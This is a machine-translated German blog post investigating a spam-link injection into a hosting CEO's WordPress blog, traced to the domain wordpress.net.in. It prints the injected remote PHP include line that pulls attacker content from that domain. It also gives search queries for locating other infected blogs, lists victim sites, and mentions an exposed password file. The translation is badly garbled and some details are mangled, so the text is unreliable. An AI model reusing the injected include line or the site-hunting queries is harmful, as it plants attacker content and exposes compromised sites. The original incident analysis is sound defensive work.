Dezember 11 2007 - Matt's Blog Heaton wurde gereinigt. ATM Er benutzt neueste Version von WordPress (2.3.x). Und auch die meisten der Blogs listet in diesem Artikel wurde Upgrade.
26. Januar 2008 - scheinen wie bluehost Ingenieur hat ein schlechtes Angebot an Reinigungs-, Spam-goro ist zurück.
Kurz nach der jüngsten Ausgabe auf wordpress.com.cn jetzt gibt es neue wordpress imitater. Ein entfernter spamware Injektion von wordpress.net.in Ich war einer der Lesung Matt Heaton gepostet 2 Tage alt, als ich gefunden Haufen spamsware Link auf seine wordpress Fußzeile.
Matt's ist mit Standard-wodpress Thema (kubrick) mit Einzel-javascript für AdSense. Die einzige Möglichkeit die Spams bekommen können, ist wahrscheinlich über php Injektion oder durch manuelle Bearbeitung. Alle spamware ist die Umleitung zu howardowens.com /? Order = XX-Seite.
Lookup für howardowens.com
Das folgende Diagramm erklärt die Lookup-Ergebnisse für howardowens.com. Klicken Sie auf das Bild, um es zu vergrößern.
Überraschenderweise der Spammer-Website ist auch Gastgeber von bluehost.com (69.89.16.0/20, 74.220.192.0/19, 69.89.16.4 -> box183.bluehost.com).Tracking der Spam-Quellen.
Anzeigen mattheaton.com html Quellen fand ich einige Hinweise und starten Sie die Suche nach xanax intext: id = \ "goro \". Google Rückkehr 2 Ergebnisse für diese Abfrage. - 1. Wordpress Support
- php bekommen footer Spam-Code hinzufügen?
- 2. Elijahzarwan.net
- div id = "Goro" (NICE Überschrift)
Beide Seiten legen nahe, dieselbe Art von PHP Injektion Methoden
include ( "http://wordpress.net.in/statcounter.php ');Die statcounter.php ist nur normal text / plain voll mit Spam-Links. Die Spam-Inhalte auf Matt Heaton Blog ist zufällig generiert aus http://wordpress.net.in/ [Zufall] / random = 1 - 9.
Raw Whois für wordpress.net.in
Domain-ID: D2500581-Um Domain-Name: WORDPRESS.NET.IN Erstellt am :22-Apr-2007 12:01:55 UTC Letzte Aktualisierung am :22-Jun-2007 02:26:40 UTC Expiration Date :22-Apr - 2008 12:01:55 UTC Sponsoring Kanzler: direkte Informationen Pvt. Ltd dba PublicDomainRegistry.com (R5 Um-) Status: OK Registrant ID: DI_4275224 Registrierende Name: Mick Jagger Registrierende Organisation: N / A Registrant Street1: 1 Roten Platz Registrierende Stadt: Moskau Registrierende Staat / Provinz: Massachusetts Registrierende PLZ: 123592 Registrierende Land: RU Registrierende Telefon: 007,7581235641 Registrierende E-Mail: mkk.goro @ bk.ru Admin-ID: DI_4275224 Admin Name: Mick Jagger Admin-Organisation: N / A Admin Street1: 1 Roten Platz Admin Stadt: Moskau Admin-Staat / Provinz: Massachusetts Admin Postal Code: 123592 Admin Land: RU Admin Telefon: 007,7581235641 Admin E-Mail: mkk.goro @ bk.ru Tech-ID: DI_4275224 Tech Name: Mick Jagger Tech Organization: N / A Tech Street1: 1 Roten Platz Tech-Stadt: Moskau Tech Staat / Provinz: Massachusetts Tech Postal Code: 123592 Tech-Land: RU Tech Telefon: 007,7581235641 Tech-E-Mail: mkk.goro @ bk.ru Name Server: MKKG98981.MERCURY.ORDERBOX DNS.COM Name-Server: MKKG98981.VENUS.ORDERBOX - DNS.COM Name Server: MKKG98981.EARTH.ORDERBOX DNS.COM Name-Server: MKKG98981.MARS.ORDERBOX-DNS.COM
Hinweis: Der Registrierungspflichtige Adresse auf 1 rotes Quadrat ist ein berühmtes Restaurant in Moskau.
Seine ziemlich offensichtlich, dass wordpress.net.in gehören Registrar in Indien.
Live Beispiel wordpress.net.in Injektion
Google-Abfrage für Warnung "[function.include]" allintext: "wordpress.net.in". Gebraucht Geiger oder jede HTTP-Inspektor, um die vollständigen Header Anfrage.
- 1 Evan Morris
- Wordpress 2.0.6 | url | Screenshot
- 2 carwax
- Wordpress 1.5.2 | url | Screenshot
- 3 aabenthus.biz
- Wordpress 2.0.x | url | Screenshot
- 4 mythinger.com
- Wordpress 2.0.2 | url | Screenshot
- 5 classicalanglican.net
- Wordpress 2.0.2 | url | Screenshot
- 6 echo9er.net
- WordPress 1.5.1 | url | Screenshot
- 7 boyarick.com
- Wordpress 2.0.2 | url | Screenshot
Google Directory-Suche nach Klasse-Mail.php
Suche nach Klasse-Mail.php im Open Directory (öffentliche).
"Übergeordnetes Verzeichnis" Klasse-Mail.php-html-htm-php-shtml-md5-MD5-Summen- jean-cyril.com - WP-includes Spams Link Umleitung zu www.901am.com/?page=2157. jean-cyril.com hat wp-info.txt innerhalb seiner wp-includes-Verzeichnis. Dieser Text-Dateien halten unserialize Passwort-Datenbank und so.
- floaridablog.org - WP-includes Spams Umleitung zu communications.uml.edu / sunrise /? id = 1076 (University of Massachusetts Lowell) wird der säumige Spams Seite wurde entfernt von UML-Maintainer.
Ausblenden von der Search Engine Spiders
Erstens, ich habe etwas mehr vergleichende Suche auf archive.org zu howardowens.com und mattheaton.com. Es sich beide Seiten dieser wurde von Stop-IA Archiver wenige Monate vor Beginn der Spams zeigen auf ihre Fußzeile. Sie müssen prüfen, howardowens Index auf archive.org, so können Sie verstehen, meine misstrauisch.
- http://web.archive.org/web/ * / http://www.howardowens.com
- http://web.archive.org/web/ * / http://www.mattheaton.com
Aus Langeweile verhüllte ich mich, wie das folgende Agenten.
- Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) - 74.6.8.125 - llf520032.crawl.yahoo.net
- Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html) 66.249.64.50 - crawl-66-249-64-50.googlebot.com
- Mozilla/2.0 (compatible; Ask Jeeves / Teoma) - 65.214.44.204 - egspd42002.ask.com
- Mediapartners-Google/2.1 66.249.73.213 - crawl-66-249-73-213.googlebot.com
Nicht viel Veränderung in diesen beiden Standorten. Dann las ich die Status-Header, so Rückkehr 404 statt 200. Nizza Tricks zu stoppen Crawler & Spinne aus ihrer Freude Spionage-Ride-spamhouse.
Zusammenfassung
Bits & Bytes aus diesem Unfall wussten wir, dass
- Die meisten der Website injizieren laufen auf WordPress 2.0.6 & unten
- allow_furl_open eingestellt ist auf "true" für diese Injektion zu arbeiten
- Die meisten der Blogs Besitzer ist nicht bekannt über die Spam-Links (cloacking)
Kasse Murray Zugang anmelden, wird es Ihnen einige Ideen mit der Fernbedienung Injektionen Methoden.
Aktualisieren
- Dezember 03 2007
- Alle Spams Link zu howardowens.com Seite wurde entfernt. Ich habe im Gespräch mit howardowens aber ich gehe davon aus howard's Website wird injiziert die gleiche Weise wie Matt Heaton-Blog.
- Dezember 04 2007
- Mattheaton.com hat eine geringfügige Änderung, die Spams jetzt spritzen auf beiden Kopf-und Fußzeile.
tangonoticias.com: 7070/d_pill/577.html.
Wie tangonoticias.com läuft auf Joomla CMS sie schaffen eine statische "Wordpress" auf Port 7070 (Real Network Server & RSTP Port). Dies ist wahrscheinlich ein Werk der verschiedenen Angreifer, unter Nutzung von Matt Heaton blindspot. Google-Cache (12. November) - Dezember 11 2007
- Matt Heaton wurde gereinigt. Er ist nun mit dem neuesten Version von Wordpress (2.3.1). Sie können es immer noch im Cache gespeicherten dachte & Screenshots.
Verwandte Post
- Wie an die entfernten wordpress.net.in Spam-Injection
- 31. Januar 2008 - Matt Heaton bluehost Hostmonster CEO Hacked Again - Strike II
Externe Links
- Bluehost Hostmonster CEO's Blog
- DNS-Lookup-Ergebnisse für wordpress.net.in
- Aboutus.org Wiki auf MattHeaton.com
- Sicherheitslücken National Database (NVD) auf Wordpress 2,0> 2.0.5 Schwachstellen
- Murray's Blog Meine Wordpress geknackt
- Pseudo-Fehler - mehr zufällige wordpress blogs seo im Besitz von Spammern
- 1. Dezember 2007 um 9.55 Uhr
- 21. Februar 2008 um 12:27 Uhr
- 0,3
- URL
"schreiben, als ob Sie sich unterhielten, ein guter Freund (vor Ihrer Mutter)."
. Ihre Meinung zählt
Disclaimer: Für alle Inhalte, die Sie veröffentlichen, gewähren Sie hiermit zu Kakkoi die gebührenfreie, unwiderrufliche, unbefristete, exklusive und vollständig sublizenzierbare Lizenz zu nutzen, zu reproduzieren, zu modifizieren, anzupassen, zu veröffentlichen, zu übersetzen, abgeleitete Arbeiten erstellen, verteilen, die Durchführung und den Anzeige solcher Inhalte ganz oder teilweise, welt-weit zu tragen und sie in anderen Werken, in irgendeiner Form, Medien oder Technologie jetzt bekannt ist oder später entwickelt. Some rights reserved.










Eine Antwort auf "Matt Heaton bluehost HostMonster CEO offizielle Blog gehackt"
[...] הבלוג הרשמי של מט הטון נשיא חברות האחסון אתרים:, bluehost & HostMonsr נפרץ. [...]